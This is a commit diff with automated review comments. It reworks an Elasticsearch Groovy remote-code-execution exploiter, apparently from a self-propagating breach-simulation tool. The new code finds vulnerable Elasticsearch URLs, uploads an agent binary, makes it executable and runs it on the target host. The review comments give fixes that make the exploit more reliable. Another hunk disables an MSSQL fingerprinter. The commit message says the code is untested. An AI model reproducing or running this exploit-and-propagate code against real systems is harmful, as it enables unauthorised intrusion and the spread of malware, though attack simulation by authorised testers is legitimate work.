Uploaded and modified standard web_rce code usage. Not working, not tested.
This commit is contained in:
parent
3f809403d1
commit
8ddfb03f27
|
@ -9,17 +9,17 @@ import logging
|
||||||
|
|
||||||
import requests
|
import requests
|
||||||
|
|
||||||
from exploit import HostExploiter
|
|
||||||
from model import DROPPER_ARG
|
from model import DROPPER_ARG
|
||||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
from network.elasticfinger import ES_SERVICE, ES_PORT
|
||||||
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
|
||||||
|
from exploit.web_rce import WebRCE
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
class ElasticGroovyExploiter(HostExploiter):
|
class ElasticGroovyExploiter(WebRCE):
|
||||||
# attack URLs
|
# attack URLs
|
||||||
BASE_URL = 'http://%s:%s/_search?pretty'
|
BASE_URL = 'http://%s:%s/_search?pretty'
|
||||||
MONKEY_RESULT_FIELD = "monkey_result"
|
MONKEY_RESULT_FIELD = "monkey_result"
|
||||||
|
@ -38,40 +38,52 @@ class ElasticGroovyExploiter(HostExploiter):
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
super(ElasticGroovyExploiter, self).__init__(host)
|
||||||
self._config = __import__('config').WormConfiguration
|
|
||||||
self.skip_exist = self._config.skip_exploit_if_file_exist
|
|
||||||
|
|
||||||
def is_os_supported(self):
|
|
||||||
"""
|
|
||||||
Checks if the host is vulnerable.
|
|
||||||
Either using version string or by trying to attack
|
|
||||||
:return:
|
|
||||||
"""
|
|
||||||
if not super(ElasticGroovyExploiter, self).is_os_supported():
|
|
||||||
return False
|
|
||||||
|
|
||||||
|
def exploit_host(self):
|
||||||
|
# self.exploit_host_linux()
|
||||||
if ES_SERVICE not in self.host.services:
|
if ES_SERVICE not in self.host.services:
|
||||||
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
||||||
return False
|
return False
|
||||||
major, minor, build = self.host.services[ES_SERVICE]['version'].split('.')
|
# We need a reference to the exploiter for WebRCE framework to use
|
||||||
major = int(major)
|
exploiter = self.exploit
|
||||||
minor = int(minor)
|
# Build url from host and elastic port(not https)
|
||||||
build = int(build)
|
urls = WebRCE.build_potential_urls(self.host, [[ES_PORT, False]], ['_search?pretty'])
|
||||||
if major > 1:
|
vulnerable_urls = []
|
||||||
|
for url in urls:
|
||||||
|
if WebRCE.check_if_exploitable(exploiter, url):
|
||||||
|
vulnerable_urls.append(url)
|
||||||
|
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
||||||
|
if not vulnerable_urls:
|
||||||
return False
|
return False
|
||||||
if major == 1 and minor > 4:
|
|
||||||
return False
|
|
||||||
if major == 1 and minor == 4 and build > 2:
|
|
||||||
return False
|
|
||||||
return self.is_vulnerable()
|
|
||||||
|
|
||||||
def exploit_host(self):
|
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config):
|
||||||
real_host_os = self.get_host_os()
|
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
||||||
self.host.os['type'] = str(real_host_os.lower()) # strip unicode characters
|
return True
|
||||||
if 'linux' in self.host.os['type']:
|
|
||||||
return self.exploit_host_linux()
|
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
|
||||||
else:
|
return False
|
||||||
return self.exploit_host_windows()
|
|
||||||
|
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0])
|
||||||
|
|
||||||
|
# We can't use 'if not' because response may be ''
|
||||||
|
if data is not False and data['response'] == False:
|
||||||
|
return False
|
||||||
|
|
||||||
|
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False:
|
||||||
|
return False
|
||||||
|
|
||||||
|
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False:
|
||||||
|
return False
|
||||||
|
|
||||||
|
return True
|
||||||
|
|
||||||
|
def exploit(self, url, command):
|
||||||
|
payload = self.JAVA_CMD % command
|
||||||
|
response = requests.get(url, data=payload)
|
||||||
|
result = self.get_results(response)
|
||||||
|
if not result: # not vulnerable
|
||||||
|
return False
|
||||||
|
return result[0]
|
||||||
|
|
||||||
def exploit_host_windows(self):
|
def exploit_host_windows(self):
|
||||||
"""
|
"""
|
||||||
|
|
|
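Review bot: In the new `exploit_host`, the guard `if data is not False and data['response'] == False` lets a failed upload fall through: when `WebRCE.upload_monkey` returns `False` the condition is skipped and the next statement indexes `data['path']` on a bool, raising TypeError instead of returning False. The check should read `if data is False or data['response'] == False:`, which still keeps the empty-`''` response case the comment is worried about. Separately, the version gate that lived in the removed `is_os_supported` (ES 1.x up to 1.4.2) has no counterpart on the new side, so `check_if_exploitable` now appears to fire the Groovy payload at every host advertising ES_SERVICE regardless of version; a cheap version pre-check before the URL loop would avoid that noise. The new `exploit` method also calls `requests.get(url, data=payload)` with no `timeout=`, so a half-open port can stall the whole exploit loop. `JAVA_CMD` and `get_results` are referenced here but defined outside this hunk.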
@ -29,7 +29,8 @@ class MSSQLFinger(HostFinger):
|
||||||
Discovered server information written to the Host info struct.
|
Discovered server information written to the Host info struct.
|
||||||
True if success, False otherwise.
|
True if success, False otherwise.
|
||||||
"""
|
"""
|
||||||
|
# TODO remove auto-return
|
||||||
|
return False
|
||||||
assert isinstance(host, VictimHost)
|
assert isinstance(host, VictimHost)
|
||||||
|
|
||||||
# Create a UDP socket and sets a timeout
|
# Create a UDP socket and sets a timeout
|
||||||
|
|
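Review bot: The added unconditional `return False` ahead of `assert isinstance(host, VictimHost)` turns this fingerprinter into a no-op for every host and leaves the rest of the method unreachable; the TODO calls it temporary, but nothing stops it from shipping as-is. If MSSQL fingerprinting has to stay off while the exploiter is untested, gate it on a visible switch rather than dead code, e.g. `if not MSSQL_FINGER_ENABLED: return False` with the constant defined at module level, so the disabled state is discoverable from configuration rather than hidden mid-method. The enclosing method starts and ends outside the hunk.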